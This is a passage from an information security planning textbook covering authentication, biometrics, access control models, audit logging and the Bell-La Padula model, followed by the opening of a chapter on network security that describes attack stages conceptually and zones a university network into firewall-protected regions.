7.3.2 Authentication: Login or Identification Authentication is the mechanism of identifying users to enable access to a system. The traditional method of authentication is login and password, where the login identifies who you are, and the password is the secret that only you know. The password mechanism is inadequate because passwords can be guessed (via social engineering, dictionary attacks or brute force) and password files can be copied to be repeatedly attacked elsewhere. In the worst case, password guessing is extremely easy when the default password for a device was never changed. Some precautions can help to protect the login-password method. For every device, passwords shall always be changed from the default and should never be written down or retained near the terminal or in a desk. It is best to configure operating systems to require complex passwords, periodic password changes, and retention of a password history. Passwords should be long and complex, including 2–3 of: alpha, numeric, upper/lower case, and special characters. While the ‘recommended’ length is at least 8 characters, using a 12- or 16-character password is much safer, providing more protection than complexity alone. Passwords should not be identifiable with the user, for example, a family member or pet name or favorite holiday. Preferably passwords are changed as often as possible: every 30 days or less for very high security applications, quarterly for high security applications, and annually otherwise. The password history feature ensures that a password cannot be reused during a period, for example 1 year. Password characters should never be displayed when typed, except via asterisks: ***. The login-password combination is known as single-factor authentication, since it relies on ‘something you know’. Identification can include other factors, such as ‘something you are or do’: biometrics, and ‘something you have’ such as badges or identification cards [4, 8]. Multi-factor authentication includes two or more forms of ID, and is considered superior to the simple login/password combination. Thus a two-factor authentication might include login+password+fingerprint, which is something you know and are. A three-factor authentication would include each something you know, have, and are/do.

7.3  Step 2: Selecting Controls

135

7.3.2.1 Biometric Systems Biometrics can be used to recognize ‘something you are’ such as fingerprint, face, hand, iris and retina, or ‘something you do’, such as signature and voice [8]. Biometric systems are evaluated by user acceptance, accuracy, reliability, and cost/ storage requirements. For example, retina matching is highly accurate, but deemed invasive since a person needs to stand 1–2 inches away from a device for a good read. Palms, hands, and fingerprints are more socially acceptable, but do require physical contact with a reader, which may get slimy. Also physical injuries may affect accessibility. Iris readers do not require physical contact and are socially acceptable, but require large storage and are high cost. Biometric systems do not provide 100% accuracy. Their accuracy is measured by percentage using a False Rejection Rate (FRR), which is the rate of valid users rejected due to no recognition and False Acceptance Rate (FAR), which is the rate of invalid users accepted due to false recognition. The biometric devices are tuned to minimize both types of errors, when FRR = FAR, which is known as the Equal Error Rate (EER). Considerations for different types of biometrics include [16]: • Accuracy: Palm, hand, iris, retina have low EER rates. • Acceptability: Some techniques are deemed invasive, such as retina scanning, where the eye needs to be less than an inch from the reader. Also, physical contact at public readers may be less acceptable. • Cost, storage: Complexity and storage requirements per user identity vary by biometric type. • Reliability: Injuries may affect fingerprint recognition; a cold may hamper voice recognition. Replay may be possible (e.g., voice recognition). • Variability: Biometrics does not change for people and if biometrics are stolen, identity is stolen. While voice and signature recognition may change to use different pass phrases, deep fakes may even hamper those technologies. While biometrics can provide more reliable authentication, it does need to be securely installed and handled. Biometric data must be stored, backed up and transmitted in an encrypted way. There should be a backup authentication method, if this method fails. Biometric devices must be physically protected: if a door entry device can be screwed off a wall, it provides no security. Finally, there should be adequate documentation and testing to help people use the device and validate its operation.

7.3.3 Authorization: Access Control Assuming the computer user has successfully authenticated (or logged in), access control will decide permissions of what the user can do on the computer. Forms of access control include [4, 8]:

136

7  Designing Information Security

Role-Based Access Control (RBAC): This technique allocates permissions by role. RBAC has the advantage of simplicity, in that all members of the department have identical permissions and quick implementation, since multiple users can be assigned as a group, not individuals. This type of access control is used in the workbook (and Tables 7.5 and 7.6). Attribute-Based Access Control (ABAC): Access control for roles may not only be defined per form and report, but also be defined per attribute or field on forms. Thus, some roles will have different permissions to read/write for specific fields or forms. Mandatory Access Control (MAC): MAC is system-determined access control. It is often used within operating systems to control access to files. Terry is allowed to read FileA and FileB, can read or write to File C, but cannot access File D. In the UNIX-style MAC example in Fig. 7.2, John has read, write, execute (rwx) Table 7.5  Partial table of roles for university (workbook exercise) Role name Student

Role description Registers for courses, work-study, and scholarships. Pay bills. Examines personal grades and grade history. Accesses university resources: library, courses or learning management system (LMS) Instructor Observes registration and creates grades for personally-taught classes in registration system. Submits files (notes, homework), quizzes, and grades to LMS, reads student homework and quiz submissions Registrar Organizes courses, school calendar. Distribute transcripts upon purchase. Audit graduation Advisor Reads student transcripts and grade reports for personally-designated advisees and students in own major. Write advising notes for same students

Current staff (example roles) Includes undergraduate and graduate students, full and part-time Includes adjuncts, instructors, and professors

Registrar, asst. registrars Includes advising department, advising staff outside advising department, faculty who advise

Table 7.6  Partial role-based access control for university (workbook exercise) Role name Instructor

Advising

Registration 

Information access (e.g., record or form) and permissions (e.g., RWX) Student records: grading form (for own courses) RW   Student transcript (current students) R   Transfer credit form R Learning Mgmt System: All parts (RW) except students work submissions (R) Student records: Student transcript (current students in major area) R   Fee payment R   Transfer credit form R   Advising notes: RW, create Student records: Fee payment RW   Transfer credit form RW   Specialized advising and course registration forms RW

7.3  Step 2: Selecting Controls

137

Fig. 7.2  Various examples of access controls

permissions for File A, while the Mgmt group has read, execute (r x) permissions. Also, in Table 7.2, the “Granted Permissions” entry defines who has access to the file, without worrying about form-level access. Users are allocated to a MAC group according to any definition. Discretionary Access Control (DAC): DAC enables a user with permissions to distribute those permissions. In this case, John has permissions to records A-F, and he give June permissions for A-C, while May gets permissions for D-F. These two persons, June and May, can then divvy out permissions to other people within the permissions they have. Thus, June can give permissions to A, B, or C, but not D. DAC may be used within databases. Physical Access Control: This technique provides or prevents access to physical locations, via keys, badges, biometrics readers, locks, and fences.

7.3.4 Accountability: Logs For secure applications, for example performing financial transactions or writing medical prescriptions, people must be accountable for their actions. The best way to ensure accountability is to record or log transactions using login IDs: Who did what when? Periodic review helps to find accesses with excess authority and track fraud. The U.S. HIPAA health regulation requires such audit trails. Audit trails should be sensitive to privacy: protected information should be encrypted. A second use of logs is that they also record access violations to the computer, network or data files, such as login successes and failures.

138

7  Designing Information Security

Intruders in a computer system often want to change the audit trail to hide their tracks. Therefore, logins must be unique and logs can never be changed. The best log mechanisms use write-once devices or are signed with digital signatures, and are shipped offsite to large storage soon after writing. Segregation of duties is important with logs. Preferably security personal would configure system logs while system administration performs jobs which create the logs. Even security and systems admins and managers have READ-only access to logs. After a sufficiently long period logs can be deleted. PCI DSS requires logs to be retained for 1 year, with logs from the last 3 months quickly accessible [3]. Monitoring audit trails is an important tool to recognize intruders. Log monitoring is required by security regulation/standards such as HIPAA and PCI DSS. PCI DSS requires daily review of security, payment card and other critical devices or systems. However, audit logs are proliferous, and require professional IT staff to monitor. Audit Reduction tools filter important logs and analyze log trends. Such tools are known as Security Information and Event Management (SIEM) [9]. Two methods such log analysis tools use include: • Attack/Signature Detection: A sequence of log events may signal an attack (e.g., 1000 login attempts). • Trend/Variance-Detection: Notices changes from normal user or system behavior (e.g., login during night for daytime employee).

7.3.5 Audit Management may monitor accountability through internal reports. During an internal or external audit, and auditor should be concerned that information security policies and procedures are thoughtful documented and implemented, including that authorization is documented and matches reality and that access follows need-­ to-­know. Workers (employees and volunteers) should be aware of security awareness and their security responsibilities, through regular training. Data owners and data custodians must be implementing their responsibility for safeguarding data, and Security Administrators should be providing adequate physical and logical security for the information security program, data and equipment, and monitoring logs [16].

7.4 Step 3: Allocating Roles and Permissions A simple way to start allocating permissions is to use Role-Based Access Control to define various roles in the organization, and then allocate permissions to the various roles [4, 8]. Users are allocated a role (e.g., June is an Accountant) and the role has permissions (Accountant has access to files or records A–C). Permissions can be set at the application, file, form or attribute-within-form basis. Permissions can be

7.5  Advanced: Administration of Information Security

139

allocated for Create (C) as in create a new customer or transaction, Read (R) e.g., read a record, Write (W) or change/edit a record, Execute (X) as in run a program, and Delete (D). Below, Table 7.5 defines three roles for a university, and Table 7.6 defines permissions. These examples are short for demonstration purposes only – a complete security must consider the full scenario, at least within a defined scope. Roles and permissions are allocated via a Data Owner, traditionally in management. This manager can allocate permissions under their purview, and so can adjust Role-Based Access Control to implement Discretionary Access Control in a more personal way. If the Data Owner cannot directly allocate permissions, and instead uses a Security Administrator to allocate permissions, then these two must ensure that the permission allocation is secured and cannot be social engineered for unapproved permissions.

7.5 Advanced: Administration of Information Security An attacker often needs two pieces of information to obtain entry: a login ID and a password (unless multifactor authentication is used). Commonly named login IDs such as Guest, Administrator or Admin should be removed or renamed. Very often an attacker will know the login identifier if they know someone’s email name. To prevent this, login IDs should follow a confidential internal naming rule. A password dictionary or brute force attack will lead to multiple incorrect password guesses. When 5–6 incorrect guesses in a row occur, the account should be locked out and a log (or alarm) written. The account can be automatically reinstated some period later (e.g., 1 hour or 1 day). This will slow down and discourage the attacker, as well as notify the administrator that an attack is occurring. The only accounts that should never be locked out, is the locally-accessed administrator account. Local administrators – who are on-site – should always be able to get in! If an attacker becomes an Administrator, they can do anything. If they cannot easily guess an administrator password, perhaps they can get an admin to open an attachment or run an executable on a web page. This gives the attacker one-shot admin permissions to perhaps copy a password file or install a backdoor for further entry. To prevent this, minimize the number of admin accounts on every system. If you are an administrator, never check your emails or search the web using an admin account. Never share your admin account password. The admin password can be kept in a locked cabinet within a sealed envelope, where a manager has the key. Attackers who are physically present can gain entrance when a victim walks away from their computer without locking it. To minimize this, sessions should timeout and require password reentry after a period of 10–15 minutes. Just in case the attacker is successful in entry, passwords need to be protected in a system. The password file should only be readable by an administrator, and stored passwords should be strongly encrypted using a one-way algorithm. Figure 7.3 is an Activity Diagram that shows a workable user lockout algorithm. This activity diagram is a type of flow chart that begins at the black dot on the upper left side. There are two swimlanes showing the actions of the security administrator

140

7  Designing Information Security

Fig. 7.3  Password lockout algorithm

on the left, and the end user on the right. Rectangles with rounded edges are actions, and a black diamond indicates a decision point or decision connection point. To follow the logic, start at the black dot and follow the actions and their arrows. Pink rectangles with squared edges are data. They indicate a change in status of the account: unlocked or locked. The block arrows indicate a communication between the security admin and the user; emails should never contain passwords. Single Sign-On is a feature where a user uses only one password to access all systems [8]. This is achievable using a single authentication database, which all systems use to verify logins. This is a preferred technique because of its obvious advantages: one good password replaces lots of passwords and IDs consistent throughout system(s). Single sign-on reduces the possibility that people will write down passwords. Another benefit is that it leads to reduced administrator work in setup and forgotten passwords. The obvious disadvantage is that a single authentication database is a single point of failure, which can result in a total compromise if one single system password becomes known. It is also a complex implementation since it requires reconfiguration of many systems; it may even require software development to implement compatibility. This extra configuration work makes single sign-on time consuming and more expensive.

7.6 Advanced: Designing Highly Secure Environments The privacy requirements of data are related to trust [10]: how comfortable is a provider of data in sharing data with a data consumer? Medical, financial and government institutions (such as police, military) rely on consultants and their own

7.6  Advanced: Designing Highly Secure Environments

141

employees to perform certain tasks or share data. Thus, there is a need to hide certain data, while allowing the use of other data for a specifically defined purpose. Statistical data may be permitted, while the personal information upon which it is derived may not. However, even statistical data can divulge excessive information if the sample size is small. However, trust is also needed bidirectionally  – from the consumer as well. Consider that you may want to purchase something on the Internet. You can use your debit or credit card or mail in a check. You may use your work computer, your home/children’s computer, or the public library computer. These various options likely evoke different levels of confidence from you that the security of your payment card is safe. You may trust some options more than other options. Some environments, such as banking, government and defense, require more substantial levels of trust than other applications, since they demand extremely secure data classifications and suffer greater risks. A component can be trusted when it has verified security mechanisms, which cannot be disabled or subverted. This section addresses how to achieve trust, when implementing multiple levels of security. The Bell and La Padula Model describes security policies that help to build trust.

7.6.1 Bell and La Padula Model (BLP) The Military follows the Bell and La Padula Model [4]. In the traditional model, objects are assigned a security class. In the BLP model, people also are assigned an Authorization Level or a Level of Trust. The Property of Confinement states that a person can write to a classification level at their level and above (Write Up); and can read at a classification level at their level and below (Read Down). Figure 7.4 shows Joe with a Secret classification, which is shown in parenthesis. Joe can thus write to the Secret and above classification levels, and read from Secret or below classification levels. There can be issues where a high-level person needs to write orders for lower level persons. The Tranquility Principle states that an Object’s class cannot change, while the Declassification Principle enables a Subject to lower his or her own class, as an exception to the Write Up rule. People and objects can also be assigned a subject or domain area. Security classes can then be documented as: (S,D) = (sensitivity, domain) for a subject [5]. The Confidentiality Property states that a subject can access an object if it dominates the object’s classification level. In Fig. 7.5, the woman is assigned a security class of (Secret, Engineer). She can read any code, email, and user documentation within the engineering group. The BLP model defines security policy, which must be built into secure computing. A Trusted Computing Base (TCB) is a theoretical model for a high-security computer. It has desirable characteristics of being verified to adhere to security policy, which cannot be evaded or tampered with [5]. The TCB must start with trusted hardware, upon which a trusted operating system is installed [12]. Each

142

7  Designing Information Security

Fig. 7.4  BLP: property of confinement

Fig. 7.5  BLP: confidentiality property

application must then be trusted as well. Thus, hierarchical levels are defined, where each layer must be trusted. If each layer is individually constructed, security policy implementations would be duplicated. TCB subsets enable processes to share verified security policy implementations, such as authentication and access control aspects. This is implemented by having applications use TCB security implementations offered by operating systems. This hierarchical layer sharing, using encapsulation of security software, enables applications to achieve shorter time to market through less development and validation, and enables apps to inherit high security features from the O.S. [13]. However, security must be built in not only vertically, but horizontally. A Top Secret application cannot depend upon a Confidential communications network or a Non-Classified server. A network is a system with many parts. To achieve higher levels of security, all components of a high-security transaction must meet the same security class or level. Hierarchically, a Secret user must use a Secret-level computer with Secret-level applications and operating system. Vertically, the network must also be at the Secret level: routers, switches, transmissions lines, firewalls, and more. These are called dependencies: any operation at one security class depends upon all parts of the process being at that security class [11]. It is recommended to diagram the dependencies of operations or transactions in implementing security.

143

7.7 Questions

One example of dependencies may be that a system administrator normally performs email operations as a regular user, but logs into a secure account from the user account, as necessary to perform administrator duties. Simply logging into an administrator account from a user account is dangerous: user accounts are more likely to be infected with spyware, such as keystroke loggers, which copy password credentials [11]. Storing administrator passwords in a user account file is even more dangerous. These situations demonstrate that extreme care must be taken to ensure all components of a system meet a particular security class.

7.7 Questions 1. Vocabulary. Match each meaning with the correct vocabulary name. Access control Secure wiping Process owner Authentication Defense-in-depth False rejection rate

Biometrics Integrity Data owner Availability Least privilege Confidentiality

Mandatory access control Discretionary access control Multifactor authentication Sensitivity classification False acceptance rate

(a) Persons have the ability to do their primary job and no more. (b) The security goal that data shall remain secret except to qualified persons. (c) The probability that a biometric system incorrectly identifies an unenrolled user. (d) A data owner can configure permissions to users as a subset of their own permissions. (e) The security goal that data is accurate. (f) A cracker would need to penetrate multiple security controls to succeed in an attack. (g) Overwriting disk contents with a pattern to hide confidential information before disk disposal. (h) A person authorized to distribute permissions. (i) The set of categories defining the level of confidentiality of business information. (j) The security goal that data is accessible when needed by authorized persons. 2. Workbook Solution for Specific Industry. Consider an industry you currently work in or would like to work in. Assume the company is in your geographical region. You may use the Security Workbook, Information Security Chapter to complete the tables. For each table, include five or more information or asset types, and at least three roles.

144

7  Designing Information Security

(a) Create a Sensitivity Classification Table, similar to Table 7.1. (b) Create a Handling of Sensitive Data Table, similar to Table 7.2. (c) Create an Asset Inventory Table, similar to Table 7.3. (d) Create a Table of Roles, similar to Table 7.5. (e) Create a Role-Based Access Control Table, similar to Table 7.6. 3. Biometric Devices. Look up websites for three different biometric tools. What security services do they provide and for what price?

7.7.1 Health First Case Study Problems For each case study problem, refer to the Health First Case Study. The Health First Case Study and Security Workbook should be provided by your instructor or can be found at https://sn.pub/lecturer-material. Case study Health first case study Other resources Designing information security √ Security workbook, Health first requirements doc (optional)

References 1. Macy J, Brown MY (1998) Coming back to life. New Society Publishers, Gabriola Island, p 41 2. Gottshall JY (2013) Security, privacy, and whistleblowing. SC Congress, Chicago 3. PCI Security Standards Council (2013) Requirements and security assessment procedures, v 3.0, November 2013. www.pcisecuritystandards.org 4. Harris S (2013) All-in-one CISSP® exam guide, 6th edn. McGraw-Hill Co., New  York, pp 109–112, 120–124, 219–226, 369–371 5. Smith R (2013) Elementary information security. Jones & Bartlett Learning, Burlington, MA, pp 773–780 6. Grama JL (2011) Legal issues in information security, 2nd edn. Jones & Bartlett Learning, Burlington, pp 188–213 7. Liulevicius VG (2011) Espionage and covert operations: a global history. The Great Courses, Chantilly, lecture 24 8. ISACA (2010) CISA review manual 2011. ISACA, Arlington Heights, pp 320–326, 337–342 9. Stephenson P, Hanlon J, O’Connor K (2014) Product section: SIEM.  SC Mag, Haymarket Media 25(3):35–49 10. Bisdikian C, Sensoy M, Norman TJ, Srivastava MB (2012) Trust and obfuscation principles for quality of information in emerging pervasive environments. In: The 4th international workshop on information quality. Inst. for Electrical and Electronics Eng. (IEEE), http://ieeexplore. ieee.org, pp 44–49 11. Johansson JM (2014) Security watch island hopping: mitigating undesirable dependencies. http://technet.microsoft.com/en-­us/magazine/2008.02.securitywatch.aspx. Accessed 14 Feb 2014

References

145

12. Li Y, Zhang X (2010) A trust model of TCB subsets. In: IEEE proceedings of the 9th international conference on machine learning and cybernetics. IEEE, pp 2838–2842 13. Vetter L, Smith G, Lunt TF (1989) TCB subsets: the next step. In: Fifth annual computer security applications conference. IEEE, pp 216–221 14. ISACA (2020) CDPSE™ review manual. ISACA, Schaumberg 15. Granlund D, Åhlund C (2011) A Scalability Study of AAA Support inHeterogeneous Networking Environments withGlobal Roaming Support. 2011 International Joint Conference of IEEE TrustCom-11, IEEE, New York 16. ISACA (2019) CISA(R) Review Manual, 27th Edition, ISACA, Arlington Heights IL

Chapter 8

Planning for Network Security

There is a reason why BlackBerries and iPhones are not allowed in the White House Situation Room. We know that the intelligence services of other countries – including some who feign surprise over the Snowden disclosures – are constantly probing our government and private sector networks, and accelerating programs to listen to our conversations, and intercept our emails, and compromise our systems. – Pres. Barack Obama, Jan. 17, 2014 [1]

The Internet allows an attacker to attack from anywhere in the world from their home desk. They just need to find one vulnerability, while a security analyst needs to close every vulnerability. If that sounds nearly impossible to defend, then implement defense in depth: many layers require an attacker to penetrate multiple levels of security to succeed. In Chap. 7 on Information Security, we classified information assets and defined how each class of assets should be protected. In this chapter, we implement that classification system into the network.

8.1 Important Concepts Network security builds on the concepts introduced in the Information Security chapter, including Defense in Depth and Least Privilege. A defense in depth should have many layers, similar to an onion. The multiple layers in an IT network should include: firewall, antivirus, authentication, strong encryption, access control, logged problems, etc. To achieve least privilege, firewalls, servers and computers should be configured to support the minimum required applications and no more (providing less features to attack!) It is important to understand how hackers attack, to better defend against them. The next section defines how attacks to computer systems and networks occur. The first line of defense for network security is the packet filter, which will be explained before starting the design. Additional controls to establish defense in depth are defined later in the chapter.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2024 S. Lincke, Information Security Planning, https://doi.org/10.1007/978-3-031-43118-0_8

147

148

8  Planning for Network Security

8.1.1 How Crackers Attack Chapter 1 introduced some of the tools and techniques crackers use to attack an organization. This chapter goes more in depth to describe more of the network tools used in attacks. Stages of an attack can include [2–4]: 1. Target Identification: Attackers may choose to perform an opportunistic or targeted attack. An opportunistic attack focuses on any site that may be easy to break into (playing the odds); a targeted attack has a specific victim in mind, and searches for a vulnerability that will work. 2. Reconnaissance: Like a bank robber who might case a bank before an attack, a cracker may investigate an organization before attacking. Social techniques include: dumpster diving, web searches for additional information (Google, news, web sites), and social engineering. Example network investigation techniques include: • WhoIs Service: Enquiring into this database to find system administrator and Internet information relating to a specific organization. • War Driving: Driving (or walking) around to find an internal wireless local area network to connect to. This may include MAC spoofing, where a criminal adopts another person’s WLAN or MAC identification, to connect to the network, and hijacking where they could take over that person’s connection. • War Dialing: An intruder dials phone numbers associated with an organization to find a modem to connect to. • Protocol Sniffing: Observing packet transmissions – easy with unencrypted or poorly encrypted wireless LANs. • Network Scanning: Polling computer IP addresses to determine which devices exist, and for each device, the type of computer (e.g., server, point of sale, user terminal) and its operating system and applications (TCP/UDP ‘port’ addresses). Enumeration includes scanning each port (or application) on each computer to learn which applications exist and respond to connection requests. • Network Traffic Analysis: Observing encrypted traffic can hide data contents. However, it does not hide the amount of data sent and where data is being sent to, including which specific applications are being used at which IP address sites. • Domain Name Server Interrogations: Abusing the IP name translation system to obtain information about a network. 3. Gaining Access: In this stage the cracker gains entrance into a computer via social engineering or hacker tool attacks. Once they achieve access in an internal system, the crackers may launch attacks toward their intended target, such as a server or point of sale device. Often, the initial access is obtained via spear phishing (directed fraudulent email) [4]. Other initial or progressive attacks include: • Scanning for Vulnerabilities: Determining the system type, then checking for Common Vulnerabilities and Exposures (CVEs or known bugs)

8.1  Important Concepts

149

• Remote Code Execution: Remote desktop (with credentials) enables execution of code on target servers. • Watering Hole attack: Criminals take advantage of unpatched software in public websites to infect those websites with malware. • Man-in-the-Middle attack: An attacker spoofs, or pretends to be, the desired destination. The spoofer forwards all communications between victim and desired endpoint, hiding the attack but gaining valuable information. For example, an attacker may create a wireless local area network access point that pretends to be an organizational access point. The rogue access point forwards information between the victim and the real access point, copying credentials and other information. • SQL Injection attack: Attackers manipulate web form input to modify the database commands implemented within the form. Database manipulations may include adding commands (e.g., delete file or show all) or modifying commands (e.g., to make an invalid password look like a valid one). • Password Guessing: Attackers may use password dictionaries or brute force attacks to guess login credentials. 4. Hiding Presence: A rootkit is a set of malware that hides the attacker’s actions. System utilities or the operating system are modified to hide the attacker’s actions; logs are modified or prevented from writing certain alarms. 5. Establishing Persistence: Attackers install Command and Control software, which enables them to remotely control the computer. The attacker may weaken security by establishing a backdoor, which is a mechanism for entry into a system. Often they escalate their access capabilities by installing a keystroke logger or copying the password file. 6. Execution: Intruders may target financial information, trade secrets, or personally identifiable information. Exfiltration of sensitive data can be concealed, as a covert channel, by transmitting the data within an innocuous data stream, such as web output or hidden within a video or graphics file transmission (called steganography). In addition to copying information, the attacker may use the new ‘acquire’ as a bot or launch one or more attacks on an internal system or someone else’s system (e.g., Distributed Denial of Service, ransomware). 7. Assessment: What went right and wrong? Learn from mistakes.

8.1.2 Filtering Packets to Restrict Network Access The concept of Least Privilege extends to network security. Firewalls and routers have a filtering capability that should be configured to permit only approved applications or services to enter the network. Figure 8.1 shows a network filter permits only packets for certain applications, source/destination addresses, and packet types (requests versus responses). Source/destination address filtering occurs using the Internet Protocol (IP) address, while applications are filtered using the Transport Control Protocol (TCP) or User Datagram Protocol (UDP) address. When these

150

8  Planning for Network Security

Fig. 8.1  The role of the network filter

routing devices fail, such as potentially during a DOS attack, they can either pass packets indiscriminately or fully restrict access. A fail closed or fail secure implementation ensures that no packets pass through, protecting the network from additional attacks. Firewalls should fail closed. Additional capabilities of firewalls will be discussed in the Advanced section in the chapter. A fail open or fail safe implementation would assume that if, for example, a door was to fail, it should fail unlocked. This would normally not be good for security but applies for doors if there is a fire. People should be allowed out of a locked door, in case of fire and thus doors fail open or fail safe.

8.2 Defining the Network Services As part of the network security design, we first need to establish what legal transactions are and from what devices they may arise. We will secondly classify those services using sensitivity and criticality classes. Thirdly, we will separate our network into zones, with sufficient filters (or firewalls) to allow legal transactions and detect and reject illegal transactions. Fourthly, we define controls for each zone, to adequately meet the security requirements of the services. Finally, we will draw a diagram of our full network, showing zones and classifiations.

8.2.1 Step 1: Inventory Services and Devices: Who, What, Where? We want to permit only legal transactions within our network. We consider: • Which services will we support in our network? • Which internal services can be accessed from the outside (i.e., Internet)?

8.2  Defining the Network Services

151

Fig. 8.2  Informal sketch of logical access

• Which external services (in the Internet) can be accessed from the internal network? • Who and where (from the inside and outside) can access these permitted services? • What devices are permissible in our network? By carefully answering these questions and correspondingly configuring the network, a form of network access control is implemented. In Fig. 8.2 is an informal diagram showing who can access the basic services of a university. The big gray circle represents the campus; faces outside the circle are off-campus. Databases are shown as cylinders, which are color-coded to reflect their sensitivity class: black = confidential; gray = privileged; and white = public. Faces represent different people, and arrows point in the direction that the service will be requested. This informal diagram shows that only on-campus nurses have access to the nurse database. Students and instructors have access to the Learning Management System and the Registration system, but on-campus students can also access the lab and library resources. Off-campus students may access library resources via login. This diagram does not show that students and instructors can access any web sites on the Internet; however, that is reflected in the last row of Table 8.1 below. Table 8.1 is the table which documents an informal sketch of logical access. 8.2.1.1 Inventorying Devices It is also important to inventory the permissible devices in the network [19]. In a university environment, student devices are unpredictable and these devices are not inventoried, but they are only allowed in special lab or dorm areas. Even public labs should verify that network devices are valid, to avoid rogue wireless access

152

8  Planning for Network Security

Table 8.1  Identifying sources and destinations for services (workbook exercise) Service (e.g., web, sales database) Registration, learning management Registration Library databases Health services External (Internet) web services

Source (e.g., home, world, local computer) Students and instructors: anywhere in the world Registrars and advisers: on campus On campus students and staff Off-campus requires login On campus: nurses office On campus: Campus labs, dorms, faculty offices

Destination (local server, home, world, etc.) Computer service servers Computer service servers Specific off-site library facilities Computer service servers Anywhere in the world

From this information we determine who can access what, from where

points. Other more secure parts of the university networks shall ensure that only specific, controlled devices are permitted on those LANs. Within more controlled networks, only controlled devices with limited software and configurations may be permitted [19]. Table 8.1 may restrict to a limited set of software. In a university environment, even faculty are permitted additional software beyond this table. However, higher risk environments, such as financial, medical, government and utility organizations, should have very strict requirements as per allowed software and strict configurations. Also, certain network zones in a university (e.g., Payment Card Zones) should strictly control software, devices and configurations.

8.2.2 Step 2: Determine Sensitivity of Services If attackers break into one computer in a network, they are likely to escalate their attack to other servers in that network’s region. Similarly, if an attacker breaks into one service, they are likely to break into other services on that same physical server. Compartmentalization or Separation partitions a network and services to provide protection between them. To achieve compartmentalization, a network is divided into regions, domains or ‘zones’ using firewalls, and different services are isolated onto different physical or virtual servers. The intention is that by separating different services, persons with (for example) manufacturing permissions cannot easily access or infiltrate engineering, sales, finance or personnel data. Allocating one service per physical server is very secure – but also expensive since it requires lots of physical computer servers. A safer way to consolidate services on one physical server is to isolate services onto different virtual servers, which are then combined onto one physical server. Each virtual (or logical) server has its own operating system and access to a limited section of disk. Virtual systems are built using products like VMware. Virtual machines use software called a

8.2  Defining the Network Services

153

Table 8.2  Partial service classifications and roles for a university (workbook exercise)

Service name (e.g., web, email) Learning management Registration

Health service Web pages: Activities, news, departments, …

Sensitivity class (e.g., Confidential) Privileged Confidential

Confidential Public

Roles (e.g., sales, engineering) Current students, instructors Current students, registration, accounting, advising, instructors Nurses Students, employees, public

Server (*=Virtual) StudentScholastic Student_Register

Health_Services Web_Services*

hypervisor to interface the virtual system’s operating system to the real computer’s operating system or hardware. Compartmentalization is achieved by grouping similar assets together. The decision of whether services (or applications) should be combined or separated must consider: (1) the data’s sensitivity classifications, (2) the roles that may access the service, and (3) the probability of any specific service being attacked. For example, email is a service highly likely to be attacked, and should not be housed with sensitive services. A good network architecture will encapsulate one main function within each compartment, creating simplicity in design through modularity and isolation. In Table  8.2, university services will be divided out by their sensitivity roles. Confidential services are protected by law, and should be in a separate network region/zone from other services. Public services, such as public web, email, and domain name server (DNS), are susceptible to attacks from the world and should be separated from any internal (Privileged) services. Registration and Health Services are both Confidential, but are accessed by very different roles. Therefore, they should be separated into different network zones or servers. Here they will be hosted on separate physical servers. Different web services, however, could be hosted on different virtual servers on the same physical server.

8.2.3 Step 3: Allocate Network Zones A network is compartmentalized into regions called zones. Simplicity of design and encapsulation allocates one main function to each zone. Each region will correspond to a related Sensitivity Class, access roles, and accessibility. Accessibility refers to the probability of being broken into: networks with wireless access, the Internet, and public services are higher risk. A Demilitarized Zone (DMZ) is a region in a network that is accessible to the public, e.g., for web and e-mail services. A Confidential Payment Card Zone is the required PCI DSS zone when payment card systems are used, such as Point-of-Sale or ATM machines [5]. One or more

8  Planning for Network Security

154

protected zones will restrict public access. Larger organizations have (at least) one zone per functional area: e.g., manufacturing, engineering, personnel. In Table 8.3  (also available in the Workbook, Network Security section), you may add or delete zones as necessary. Firewalls/routers implement compartmentalization by serving as the guards between zones. They limit or filter application transactions that enter and leave individual network zones. Many firewall/routers can handle a set of zones. Table 8.3 lists a set of zones for the University configuration. The Confidential Payment Card Zone has been renamed the Confidential Zone, since payment card information is collected via Internet and not Point-of-Sale machines. In addition, this zone has grade and health information. Wireless and Internet zones are both very high risk, and are given strong filters. Private user and server zones are separated, since user zones will periodically acquire malware, and server zones need to be well-protected against them. Technical experts can take this table, learn more about the normal operations of each application, and configure firewall(s) to permit only legal packets per zone. Table 8.3  Creating zones (workbook exercise) Zone Services Internet (external) De-militarized Web, Email, DNS zone Wireless network Wireless local employees

Privileged server Databases zone Confidential zone Payment card, health, registration info Privileged user Wired students/ zone employees

Student lab zone

Student labs

Remote cloud configuration

Learning management system

Zone description (You may delete or add rows as necessary) This zone is external to the organization This zone houses services the public are allowed to access in our network This zone connects wireless/laptop employees/students (and possibly crackers) to our internal network. They can access select university databases, any Internet web site, email, and personal files This zone hosts our faculty servers and student servers This highly-secure zone hosts databases with payment and other confidential (protected by law) information This zone hosts our wired/fixed employee/classroom computer terminals. They can access select university databases, any Internet web site, email, and personal files This zone hosts our student lab computers, which are highly vulnerable to malware. They can access select university databases, any Internet web site, email and personal files This database is maintained with a high-availability cloud configuration

8.3  Defining Controls

155

8.2.4 Step 4: Define Controls Four types of network controls are shown in Fig. 8.3. In these mini-diagrams, Joe sends information to Ann, but attacker Bill interferes. They include: • Confidentiality ensures unauthorized parties cannot access information. Example controls include: Secret Key Encryption. • Authenticity ensures that the actual sender is the claimed sender. It counters masquerading or spoofing, where the sender pretends to be someone else. Example controls include: Public Key Encryption and Digital Certificates. • Integrity ensures that the message was not modified during transmission. Example controls include: Hashing, SHA-3, and HMAC. • Nonrepudiation ensures that the sender cannot deny sending a message at a later time. Nonrepudiation is important in signing contracts and making payments. Example controls include Digital Signature. Table 8.4 adds controls for each zone or service. Controls for each control type are described in the next section. An IT professional should configure the firewall/ router based on this table.

8.3 Defining Controls Techniques for each of the four network controls, Confidentiality, Authenticity, Integrity, and Nonrepudiation, in addition to hacker-recognition tools, are described in turn next.

Fig. 8.3  Objectives for network controls

156

8  Planning for Network Security

Table 8.4  Controls for services (workbook exercise)

Zone Internet (external) De-militarized zone

Wireless network Privileged server zone

Confidential zone

Privileged user zone

Student lab zone

Server (*=Virtual)

Service

Web_Services*, Email_Server, DNS_Server

Web, Email, DNS

Required Controls (Conf., integrity, auth., nonrepud., with tools: e.g., encryption/VPN, hashing, IPS)

